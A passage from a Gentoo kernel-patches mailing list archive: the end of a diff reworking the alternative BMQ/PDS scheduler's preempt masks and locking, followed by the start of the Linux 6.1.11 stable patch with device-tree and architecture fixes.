 +#define rt_task(p)		rt_prio((p)->prio)
@@ -786,7 +785,8 @@ index 000000000000..4bea0c025475
 +#ifdef CONFIG_SCHED_SMT
 +static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
 +#endif
-+static cpumask_t sched_rq_watermark[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
++static cpumask_t sched_preempt_mask[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
++static cpumask_t *const sched_idle_mask = &sched_preempt_mask[0];
 +
 +/* sched_queue related functions */
 +static inline void sched_queue_init(struct sched_queue *q)
@@ -810,44 +810,66 @@ index 000000000000..4bea0c025475
 +	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
 +}
 +
++static inline void
++clear_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_clear_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
++}
++
++static inline void
++set_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_set_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
++}
++
++static atomic_t sched_prio_record = ATOMIC_INIT(0);
++
 +/* water mark related functions */
-+static inline void update_sched_rq_watermark(struct rq *rq)
++static inline void update_sched_preempt_mask(struct rq *rq)
 +{
-+	unsigned long watermark = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
-+	unsigned long last_wm = rq->watermark;
-+	unsigned long i;
-+	int cpu;
++	unsigned long prio = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	unsigned long last_prio = rq->prio;
++	int cpu, pr;
 +
-+	if (watermark == last_wm)
++	if (prio == last_prio)
 +		return;
 +
-+	rq->watermark = watermark;
++	rq->prio = prio;
 +	cpu = cpu_of(rq);
-+	if (watermark < last_wm) {
-+		for (i = last_wm; i > watermark; i--)
-+			cpumask_clear_cpu(cpu, sched_rq_watermark + SCHED_QUEUE_BITS - i);
++	pr = atomic_read(&sched_prio_record);
++
++	if (prio < last_prio) {
++		if (IDLE_TASK_SCHED_PRIO == last_prio) {
++			cpumask_clear_cpu(cpu, sched_idle_mask);
++			last_prio -= 2;
 +#ifdef CONFIG_SCHED_SMT
-+		if (static_branch_likely(&sched_smt_present) &&
-+		    IDLE_TASK_SCHED_PRIO == last_wm)
-+			cpumask_andnot(&sched_sg_idle_mask,
-+				       &sched_sg_idle_mask, cpu_smt_mask(cpu));
++			if (static_branch_likely(&sched_smt_present))
++				cpumask_andnot(&sched_sg_idle_mask,
++					       &sched_sg_idle_mask, cpu_smt_mask(cpu));
 +#endif
++		}
++		clear_recorded_preempt_mask(pr, prio, last_prio, cpu);
++
 +		return;
 +	}
-+	/* last_wm < watermark */
-+	for (i = watermark; i > last_wm; i--)
-+		cpumask_set_cpu(cpu, sched_rq_watermark + SCHED_QUEUE_BITS - i);
++	/* last_prio < prio */
++	if (IDLE_TASK_SCHED_PRIO == prio) {
++		cpumask_set_cpu(cpu, sched_idle_mask);
++		prio -= 2;
 +#ifdef CONFIG_SCHED_SMT
-+	if (static_branch_likely(&sched_smt_present) &&
-+	    IDLE_TASK_SCHED_PRIO == watermark) {
-+		cpumask_t tmp;
++		if (static_branch_likely(&sched_smt_present)) {
++			cpumask_t tmp;
 +
-+		cpumask_and(&tmp, cpu_smt_mask(cpu), sched_rq_watermark);
-+		if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
-+			cpumask_or(&sched_sg_idle_mask,
-+				   &sched_sg_idle_mask, cpu_smt_mask(cpu));
-+	}
++			cpumask_and(&tmp, cpu_smt_mask(cpu), sched_idle_mask);
++			if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
++				cpumask_or(&sched_sg_idle_mask,
++					   &sched_sg_idle_mask, cpu_smt_mask(cpu));
++		}
 +#endif
++	}
++	set_recorded_preempt_mask(pr, last_prio, prio, cpu);
 +}
 +
 +/*
@@ -1369,8 +1391,8 @@ index 000000000000..4bea0c025475
 + * Context: rq->lock
 + */
 +#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
-+	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
 +	sched_info_dequeue(rq, p);						\
++	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
 +										\
 +	list_del(&p->sq_node);							\
 +	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
@@ -1378,7 +1400,7 @@ index 000000000000..4bea0c025475
 +
 +#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
 +	sched_info_enqueue(rq, p);					\
-+	psi_enqueue(p, flags);						\
++	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
 +									\
 +	p->sq_idx = task_sched_prio_idx(p, rq);				\
 +	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
@@ -1411,7 +1433,7 @@ index 000000000000..4bea0c025475
 +		  task_cpu(p), cpu_of(rq));
 +
 +	__SCHED_ENQUEUE_TASK(p, rq, flags);
-+	update_sched_rq_watermark(rq);
++	update_sched_preempt_mask(rq);
 +	++rq->nr_running;
 +#ifdef CONFIG_SMP
 +	if (2 == rq->nr_running)
@@ -1436,7 +1458,7 @@ index 000000000000..4bea0c025475
 +				  rq->queue.bitmap);
 +		p->sq_idx = idx;
 +		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+		update_sched_rq_watermark(rq);
++		update_sched_preempt_mask(rq);
 +	}
 +}
 +
@@ -2007,11 +2029,13 @@ index 000000000000..4bea0c025475
 +
 +	WARN_ON_ONCE(is_migration_disabled(p));
 +#endif
-+	if (task_cpu(p) == new_cpu)
-+		return;
 +	trace_sched_migrate_task(p, new_cpu);
-+	rseq_migrate(p);
-+	perf_event_task_migrate(p);
++
++	if (task_cpu(p) != new_cpu)
++	{
++		rseq_migrate(p);
++		perf_event_task_migrate(p);
++	}
 +
 +	__set_task_cpu(p, new_cpu);
 +}
@@ -2163,7 +2187,7 @@ index 000000000000..4bea0c025475
 +
 +	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
 +	dequeue_task(p, rq, 0);
-+	update_sched_rq_watermark(rq);
++	update_sched_preempt_mask(rq);
 +	set_task_cpu(p, new_cpu);
 +	raw_spin_unlock(&rq->lock);
 +
@@ -2525,23 +2549,50 @@ index 000000000000..4bea0c025475
 +	return dest_cpu;
 +}
 +
++static inline void
++sched_preempt_mask_flush(cpumask_t *mask, int prio)
++{
++	int cpu;
++
++	cpumask_copy(mask, sched_idle_mask);
++
++	for_each_cpu_not(cpu, mask) {
++		if (prio < cpu_rq(cpu)->prio)
++			cpumask_set_cpu(cpu, mask);
++	}
++}
++
++static inline int
++preempt_mask_check(struct task_struct *p, cpumask_t *allow_mask, cpumask_t *preempt_mask)
++{
++	int task_prio = task_sched_prio(p);
++	cpumask_t *mask = sched_preempt_mask + SCHED_QUEUE_BITS - 1 - task_prio;
++	int pr = atomic_read(&sched_prio_record);
++
++	if (pr != task_prio) {
++		sched_preempt_mask_flush(mask, task_prio);
++		atomic_set(&sched_prio_record, task_prio);
++	}
++
++	return cpumask_and(preempt_mask, allow_mask, mask);
++}
++
 +static inline int select_task_rq(struct task_struct *p)
 +{
-+	cpumask_t chk_mask, tmp;
++	cpumask_t allow_mask, mask;
 +
-+	if (unlikely(!cpumask_and(&chk_mask, p->cpus_ptr, cpu_active_mask)))
++	if (unlikely(!cpumask_and(&allow_mask, p->cpus_ptr, cpu_active_mask)))
 +		return select_fallback_rq(task_cpu(p), p);
 +
 +	if (
 +#ifdef CONFIG_SCHED_SMT
-+	    cpumask_and(&tmp, &chk_mask, &sched_sg_idle_mask) ||
++	    cpumask_and(&mask, &allow_mask, &sched_sg_idle_mask) ||
 +#endif
-+	    cpumask_and(&tmp, &chk_mask, sched_rq_watermark) ||
-+	    cpumask_and(&tmp, &chk_mask,
-+			sched_rq_watermark + SCHED_QUEUE_BITS - 1 - task_sched_prio(p)))
-+		return best_mask_cpu(task_cpu(p), &tmp);
++	    cpumask_and(&mask, &allow_mask, sched_idle_mask) ||
++	    preempt_mask_check(p, &allow_mask, &mask))
++		return best_mask_cpu(task_cpu(p), &mask);
 +
-+	return best_mask_cpu(task_cpu(p), &chk_mask);
++	return best_mask_cpu(task_cpu(p), &allow_mask);
 +}
 +
 +void sched_set_stop_task(int cpu, struct task_struct *stop)
@@ -4678,12 +4729,12 @@ index 000000000000..4bea0c025475
 +	 * find potential cpus which can migrate the current running task
 +	 */
 +	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
-+	    cpumask_andnot(&chk, cpu_online_mask, sched_rq_watermark) &&
++	    cpumask_andnot(&chk, cpu_online_mask, sched_idle_mask) &&
 +	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
 +		int i;
 +
 +		for_each_cpu_wrap(i, &chk, cpu) {
-+			if (cpumask_subset(cpu_smt_mask(i), &chk) &&
++			if (!cpumask_intersects(cpu_smt_mask(i), sched_idle_mask) &&\
 +			    sg_balance_trigger(i))
 +				return;
 +		}
@@ -4806,6 +4857,7 @@ index 000000000000..4bea0c025475
 +static void sched_tick_stop(int cpu)
 +{
 +	struct tick_work *twork;
++	int os;
 +
 +	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
 +		return;
@@ -4813,7 +4865,10 @@ index 000000000000..4bea0c025475
 +	WARN_ON_ONCE(!tick_work_cpu);
 +
 +	twork = per_cpu_ptr(tick_work_cpu, cpu);
-+	cancel_delayed_work_sync(&twork->work);
++	/* There cannot be competing actions, but don't rely on stop-machine. */
++	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_OFFLINING);
++	WARN_ON_ONCE(os != TICK_SCHED_REMOTE_RUNNING);
++	/* Don't cancel, as this would mess up the state machine. */
 +}
 +#endif /* CONFIG_HOTPLUG_CPU */
 +
@@ -4988,7 +5043,7 @@ index 000000000000..4bea0c025475
 +{
 +	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
 +	       sched_rq_pending_mask.bits[0],
-+	       sched_rq_watermark[0].bits[0],
++	       sched_idle_mask->bits[0],
 +	       sched_sg_idle_mask.bits[0]);
 +}
 +#else
@@ -5060,15 +5115,15 @@ index 000000000000..4bea0c025475
 +				if (src_rq->nr_running < 2)
 +					cpumask_clear_cpu(i, &sched_rq_pending_mask);
 +
++				spin_release(&src_rq->lock.dep_map, _RET_IP_);
++				do_raw_spin_unlock(&src_rq->lock);
++
 +				rq->nr_running += nr_migrated;
 +				if (rq->nr_running > 1)
 +					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
 +
 +				cpufreq_update_util(rq, 0);
 +
-+				spin_release(&src_rq->lock.dep_map, _RET_IP_);
-+				do_raw_spin_unlock(&src_rq->lock);
-+
 +				return 1;
 +			}
 +
@@ -5097,7 +5152,7 @@ index 000000000000..4bea0c025475
 +}
 +
 +static inline struct task_struct *
-+choose_next_task(struct rq *rq, int cpu, struct task_struct *prev)
++choose_next_task(struct rq *rq, int cpu)
 +{
 +	struct task_struct *next;
 +
@@ -5254,7 +5309,7 @@ index 000000000000..4bea0c025475
 +			prev->sched_contributes_to_load =
 +				(prev_state & TASK_UNINTERRUPTIBLE) &&
 +				!(prev_state & TASK_NOLOAD) &&
-+				!(prev->flags & TASK_FROZEN);
++				!(prev_state & TASK_FROZEN);
 +
 +			if (prev->sched_contributes_to_load)
 +				rq->nr_uninterruptible++;
@@ -5284,7 +5339,7 @@ index 000000000000..4bea0c025475
 +
 +	check_curr(prev, rq);
 +
-+	next = choose_next_task(rq, cpu, prev);
++	next = choose_next_task(rq, cpu);
 +	clear_tsk_need_resched(prev);
 +	clear_preempt_need_resched();
 +#ifdef CONFIG_SCHED_DEBUG
@@ -5293,7 +5348,7 @@ index 000000000000..4bea0c025475
 +
 +	if (likely(prev != next)) {
 +		if (deactivated)
-+			update_sched_rq_watermark(rq);
++			update_sched_preempt_mask(rq);
 +		next->last_ran = rq->clock_task;
 +		rq->last_ts_switch = rq->clock;
 +
@@ -5714,6 +5769,7 @@ index 000000000000..4bea0c025475
 +		return;
 +
 +	rq = __task_access_lock(p, &lock);
++	update_rq_clock(rq);
 +	/*
 +	 * Set under pi_lock && rq->lock, such that the value can be used under
 +	 * either lock.
@@ -6593,6 +6649,13 @@ index 000000000000..4bea0c025475
 +	return retval;
 +}
 +
++#ifdef CONFIG_SMP
++int dl_task_check_affinity(struct task_struct *p, const struct cpumask *mask)
++{
++	return 0;
++}
++#endif
++
 +static int
 +__sched_setaffinity(struct task_struct *p, const struct cpumask *mask)
 +{
@@ -7431,7 +7494,6 @@ index 000000000000..4bea0c025475
 +
 +	raw_spin_lock_irqsave(&idle->pi_lock, flags);
 +	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
 +
 +	idle->last_ran = rq->clock_task;
 +	idle->__state = TASK_RUNNING;
@@ -7978,6 +8040,14 @@ index 000000000000..4bea0c025475
 +
 +	sched_smp_initialized = true;
 +}
++
++static int __init migration_init(void)
++{
++	sched_cpu_starting(smp_processor_id());
++	return 0;
++}
++early_initcall(migration_init);
++
 +#else
 +void __init sched_init_smp(void)
 +{
@@ -8030,7 +8100,7 @@ index 000000000000..4bea0c025475
 +
 +#ifdef CONFIG_SMP
 +	for (i = 0; i < SCHED_QUEUE_BITS; i++)
-+		cpumask_copy(sched_rq_watermark + i, cpu_present_mask);
++		cpumask_copy(sched_preempt_mask + i, cpu_present_mask);
 +#endif
 +
 +#ifdef CONFIG_CGROUP_SCHED
@@ -8044,7 +8114,7 @@ index 000000000000..4bea0c025475
 +		rq = cpu_rq(i);
 +
 +		sched_queue_init(&rq->queue);
-+		rq->watermark = IDLE_TASK_SCHED_PRIO;
++		rq->prio = IDLE_TASK_SCHED_PRIO;
 +		rq->skip = NULL;
 +
 +		raw_spin_lock_init(&rq->lock);
@@ -8587,14 +8657,15 @@ index 000000000000..1212a031700e
 +{}
 diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
 new file mode 100644
-index 000000000000..7c1cc0cbca0d
+index 000000000000..c32403ed82b6
 --- /dev/null
 +++ b/kernel/sched/alt_sched.h
-@@ -0,0 +1,660 @@
+@@ -0,0 +1,668 @@
 +#ifndef ALT_SCHED_H
 +#define ALT_SCHED_H
 +
 +#include <linux/context_tracking.h>
++#include <linux/profile.h>
 +#include <linux/psi.h>
 +#include <linux/stop_machine.h>
 +#include <linux/syscalls.h>
@@ -8732,7 +8803,7 @@ index 000000000000..7c1cc0cbca0d
 +#ifdef CONFIG_SCHED_PDS
 +	u64			time_edge;
 +#endif
-+	unsigned long watermark;
++	unsigned long prio;
 +
 +	/* switch count */
 +	u64 nr_switches;
@@ -8997,17 +9068,24 @@ index 000000000000..7c1cc0cbca0d
 +}
 +
 +static inline void
-+rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
++rq_unlock(struct rq *rq, struct rq_flags *rf)
 +	__releases(rq->lock)
 +{
-+	raw_spin_unlock_irq(&rq->lock);
++	raw_spin_unlock(&rq->lock);
 +}
 +
 +static inline void
-+rq_unlock(struct rq *rq, struct rq_flags *rf)
++rq_lock_irq(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irq(&rq->lock);
++}
++
++static inline void
++rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
 +	__releases(rq->lock)
 +{
-+	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irq(&rq->lock);
 +}
 +
 +static inline struct rq *


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-09 12:34 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-09 12:34 UTC (permalink / raw
  To: gentoo-commits

commit:     d50fc37ec2f4ea158c45d728d05b5e3231502e41
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Feb  9 12:33:53 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Feb  9 12:33:53 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=d50fc37e

Linux patch 6.1.11

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1010_linux-6.1.11.patch | 8663 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 8667 insertions(+)

diff --git a/0000_README b/0000_README
index 10671afd..1fb22543 100644
--- a/0000_README
+++ b/0000_README
@@ -83,6 +83,10 @@ Patch:  1009_linux-6.1.10.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.10
 
+Patch:  1010_linux-6.1.11.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.11
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1010_linux-6.1.11.patch b/1010_linux-6.1.11.patch
new file mode 100644
index 00000000..e101abaf
--- /dev/null
+++ b/1010_linux-6.1.11.patch
@@ -0,0 +1,8663 @@
+diff --git a/Makefile b/Makefile
+index 6e34c942744e3..e039f2af17722 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 10
++SUBLEVEL = 11
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/imx7d-smegw01.dts b/arch/arm/boot/dts/imx7d-smegw01.dts
+index 546268b8d0b13..c0f00f5db11e1 100644
+--- a/arch/arm/boot/dts/imx7d-smegw01.dts
++++ b/arch/arm/boot/dts/imx7d-smegw01.dts
+@@ -198,6 +198,7 @@
+ &usbotg2 {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_usbotg2>;
++	over-current-active-low;
+ 	dr_mode = "host";
+ 	status = "okay";
+ };
+@@ -374,7 +375,7 @@
+ 
+ 	pinctrl_usbotg2: usbotg2grp {
+ 		fsl,pins = <
+-			MX7D_PAD_UART3_RTS_B__USB_OTG2_OC	0x04
++			MX7D_PAD_UART3_RTS_B__USB_OTG2_OC	0x5c
+ 		>;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8dxl.dtsi b/arch/arm64/boot/dts/freescale/imx8dxl.dtsi
+index 5ddbda0b4def0..f2c4d13b2f3c1 100644
+--- a/arch/arm64/boot/dts/freescale/imx8dxl.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8dxl.dtsi
+@@ -157,7 +157,7 @@
+ 
+ 		sc_pwrkey: keys {
+ 			compatible = "fsl,imx8qxp-sc-key", "fsl,imx-sc-key";
+-			linux,keycode = <KEY_POWER>;
++			linux,keycodes = <KEY_POWER>;
+ 			wakeup-source;
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-pinfunc.h b/arch/arm64/boot/dts/freescale/imx8mm-pinfunc.h
+index 83c8f715cd901..b1f11098d248e 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-pinfunc.h
++++ b/arch/arm64/boot/dts/freescale/imx8mm-pinfunc.h
+@@ -602,7 +602,7 @@
+ #define MX8MM_IOMUXC_UART1_RXD_GPIO5_IO22                                   0x234 0x49C 0x000 0x5 0x0
+ #define MX8MM_IOMUXC_UART1_RXD_TPSMP_HDATA24                                0x234 0x49C 0x000 0x7 0x0
+ #define MX8MM_IOMUXC_UART1_TXD_UART1_DCE_TX                                 0x238 0x4A0 0x000 0x0 0x0
+-#define MX8MM_IOMUXC_UART1_TXD_UART1_DTE_RX                                 0x238 0x4A0 0x4F4 0x0 0x0
++#define MX8MM_IOMUXC_UART1_TXD_UART1_DTE_RX                                 0x238 0x4A0 0x4F4 0x0 0x1
+ #define MX8MM_IOMUXC_UART1_TXD_ECSPI3_MOSI                                  0x238 0x4A0 0x000 0x1 0x0
+ #define MX8MM_IOMUXC_UART1_TXD_GPIO5_IO23                                   0x238 0x4A0 0x000 0x5 0x0
+ #define MX8MM_IOMUXC_UART1_TXD_TPSMP_HDATA25                                0x238 0x4A0 0x000 0x7 0x0
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw72xx-0x-rs232-rts.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw72xx-0x-rs232-rts.dts
+index 3ea73a6886ff4..f6ad1a4b8b665 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw72xx-0x-rs232-rts.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw72xx-0x-rs232-rts.dts
+@@ -33,7 +33,6 @@
+ 	pinctrl-0 = <&pinctrl_uart2>;
+ 	rts-gpios = <&gpio5 29 GPIO_ACTIVE_LOW>;
+ 	cts-gpios = <&gpio5 28 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx-0x-rs232-rts.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx-0x-rs232-rts.dts
+index 2fa635e1c1a82..1f8ea20dfafcb 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx-0x-rs232-rts.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx-0x-rs232-rts.dts
+@@ -33,7 +33,6 @@
+ 	pinctrl-0 = <&pinctrl_uart2>;
+ 	rts-gpios = <&gpio5 29 GPIO_ACTIVE_LOW>;
+ 	cts-gpios = <&gpio5 28 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx.dtsi
+index 244ef8d6cc688..7761d5671cb13 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw73xx.dtsi
+@@ -222,7 +222,6 @@
+ 	pinctrl-0 = <&pinctrl_uart3>, <&pinctrl_bten>;
+ 	cts-gpios = <&gpio5 8 GPIO_ACTIVE_LOW>;
+ 	rts-gpios = <&gpio5 9 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ 
+ 	bluetooth {
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts
+index 72311b55f06da..5a770c8b777e9 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts
+@@ -721,7 +721,6 @@
+ 	dtr-gpios = <&gpio1 14 GPIO_ACTIVE_LOW>;
+ 	dsr-gpios = <&gpio1 1 GPIO_ACTIVE_LOW>;
+ 	dcd-gpios = <&gpio1 11 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+@@ -737,7 +736,6 @@
+ 	pinctrl-0 = <&pinctrl_uart3>, <&pinctrl_uart3_gpio>;
+ 	cts-gpios = <&gpio4 10 GPIO_ACTIVE_LOW>;
+ 	rts-gpios = <&gpio4 9 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+@@ -746,7 +744,6 @@
+ 	pinctrl-0 = <&pinctrl_uart4>, <&pinctrl_uart4_gpio>;
+ 	cts-gpios = <&gpio5 11 GPIO_ACTIVE_LOW>;
+ 	rts-gpios = <&gpio5 12 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7902.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7902.dts
+index 31f4c735fe4f0..ba0b3f507855c 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7902.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7902.dts
+@@ -651,7 +651,6 @@
+ 	pinctrl-0 = <&pinctrl_uart1>, <&pinctrl_uart1_gpio>;
+ 	rts-gpios = <&gpio4 10 GPIO_ACTIVE_LOW>;
+ 	cts-gpios = <&gpio4 24 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+@@ -668,7 +667,6 @@
+ 	pinctrl-0 = <&pinctrl_uart3>, <&pinctrl_uart3_gpio>;
+ 	rts-gpios = <&gpio2 1 GPIO_ACTIVE_LOW>;
+ 	cts-gpios = <&gpio2 0 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ 
+ 	bluetooth {
+@@ -686,7 +684,6 @@
+ 	dtr-gpios = <&gpio4 3 GPIO_ACTIVE_LOW>;
+ 	dsr-gpios = <&gpio4 4 GPIO_ACTIVE_LOW>;
+ 	dcd-gpios = <&gpio4 6 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts
+index 19f6d2943d26c..8e861b920d09e 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts
+@@ -572,7 +572,6 @@
+ 	dtr-gpios = <&gpio1 0 GPIO_ACTIVE_LOW>;
+ 	dsr-gpios = <&gpio1 1 GPIO_ACTIVE_LOW>;
+ 	dcd-gpios = <&gpio3 24 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+index bcab830c6e95e..59445f916d7fa 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+@@ -98,6 +98,7 @@
+ 		off-on-delay = <500000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_reg_eth>;
++		regulator-always-on;
+ 		regulator-boot-on;
+ 		regulator-max-microvolt = <3300000>;
+ 		regulator-min-microvolt = <3300000>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn-venice-gw7902.dts b/arch/arm64/boot/dts/freescale/imx8mn-venice-gw7902.dts
+index dd4302ac1de46..e7362d7615bd1 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn-venice-gw7902.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mn-venice-gw7902.dts
+@@ -631,7 +631,6 @@
+ 	pinctrl-0 = <&pinctrl_uart3>, <&pinctrl_uart3_gpio>;
+ 	rts-gpios = <&gpio2 1 GPIO_ACTIVE_LOW>;
+ 	cts-gpios = <&gpio2 0 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ 
+ 	bluetooth {
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp-venice-gw74xx.dts b/arch/arm64/boot/dts/freescale/imx8mp-venice-gw74xx.dts
+index 06b4c93c58765..d68ef4f0726f0 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp-venice-gw74xx.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mp-venice-gw74xx.dts
+@@ -611,7 +611,6 @@
+ 	pinctrl-0 = <&pinctrl_uart3>, <&pinctrl_uart3_gpio>;
+ 	cts-gpios = <&gpio3 21 GPIO_ACTIVE_LOW>;
+ 	rts-gpios = <&gpio3 22 GPIO_ACTIVE_LOW>;
+-	uart-has-rtscts;
+ 	status = "okay";
+ 
+ 	bluetooth {
+diff --git a/arch/ia64/kernel/sys_ia64.c b/arch/ia64/kernel/sys_ia64.c
+index 215bf3f8cb204..4f24910cfe73f 100644
+--- a/arch/ia64/kernel/sys_ia64.c
++++ b/arch/ia64/kernel/sys_ia64.c
+@@ -170,6 +170,9 @@ ia64_mremap (unsigned long addr, unsigned long old_len, unsigned long new_len, u
+ asmlinkage long
+ ia64_clock_getres(const clockid_t which_clock, struct __kernel_timespec __user *tp)
+ {
++	struct timespec64 rtn_tp;
++	s64 tick_ns;
++
+ 	/*
+ 	 * ia64's clock_gettime() syscall is implemented as a vdso call
+ 	 * fsys_clock_gettime(). Currently it handles only
+@@ -185,8 +188,8 @@ ia64_clock_getres(const clockid_t which_clock, struct __kernel_timespec __user *
+ 	switch (which_clock) {
+ 	case CLOCK_REALTIME:
+ 	case CLOCK_MONOTONIC:
+-		s64 tick_ns = DIV_ROUND_UP(NSEC_PER_SEC, local_cpu_data->itc_freq);
+-		struct timespec64 rtn_tp = ns_to_timespec64(tick_ns);
++		tick_ns = DIV_ROUND_UP(NSEC_PER_SEC, local_cpu_data->itc_freq);
++		rtn_tp = ns_to_timespec64(tick_ns);
+ 		return put_timespec64(&rtn_tp, tp);
+ 	}
+ 
+diff --git a/arch/parisc/kernel/firmware.c b/arch/parisc/kernel/firmware.c
+index a115315d88e69..bd325f2b5349e 100644
+--- a/arch/parisc/kernel/firmware.c
++++ b/arch/parisc/kernel/firmware.c
+@@ -1303,7 +1303,7 @@ static char iodc_dbuf[4096] __page_aligned_bss;
+  */
+ int pdc_iodc_print(const unsigned char *str, unsigned count)
+ {
+-	unsigned int i;
++	unsigned int i, found = 0;
+ 	unsigned long flags;
+ 
+ 	count = min_t(unsigned int, count, sizeof(iodc_dbuf));
